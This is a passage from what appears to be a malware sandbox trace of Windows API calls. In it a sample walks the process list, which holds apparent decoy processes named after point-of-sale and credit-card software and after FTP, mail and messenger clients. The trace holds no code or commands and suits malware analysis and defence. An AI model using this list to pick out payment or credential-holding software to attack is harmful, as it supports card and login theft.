th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0108.674] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.675] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.676] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0108.677] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.677] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.678] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.679] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.680] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.681] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.682] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.682] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0108.683] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0108.684] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.685] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0108.686] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0108.687] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.687] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0108.688] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0108.689] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0108.690] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0108.691] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0108.692] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0108.693] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.693] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0108.694] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0108.695] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0108.696] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0108.697] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0108.698] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0108.699] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.699] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0108.700] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="populationmorningby.exe")) returned 1 [0108.704] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="daughter indeed.exe")) returned 1 [0108.704] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="generationtop.exe")) returned 1 [0108.705] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="riseleadnice.exe")) returned 1 [0108.706] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="him.exe")) returned 1 [0108.707] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="effort_network.exe")) returned 1 [0108.708] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="eighteye.exe")) returned 1 [0108.709] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nice_million.exe")) returned 1 [0108.709] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young.exe")) returned 1 [0108.710] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x808, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="avoid_figure.exe")) returned 1 [0108.711] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge.exe")) returned 1 [0108.712] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="behaviorreligious.exe")) returned 1 [0108.713] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gun_single_most.exe")) returned 1 [0108.714] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="set.exe")) returned 1 [0108.715] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="exactly.exe")) returned 1 [0108.715] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="dreamentireprice.exe")) returned 1 [0108.716] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="their.exe")) returned 1 [0108.717] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x614, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operationblack.exe")) returned 1 [0108.718] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0108.719] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x704, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0108.720] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="determine.exe")) returned 1 [0108.722] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="production-learn.exe")) returned 1 [0108.723] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0108.725] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0108.726] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0108.728] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0108.729] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0108.730] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0108.731] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1020, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0108.733] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0108.734] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0108.735] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0108.737] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0108.738] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0108.741] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0108.742] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1084, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0108.743] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0108.744] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0108.745] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0108.747] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0108.748] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0108.749] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0108.750] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0108.751] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0108.752] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0108.754] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1100, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0108.755] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0108.756] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x111c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0108.757] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0108.758] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0108.759] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0108.760] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0108.761] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0108.762] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0108.763] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0108.764] Process32Next (in: hSnapshot=0x358, 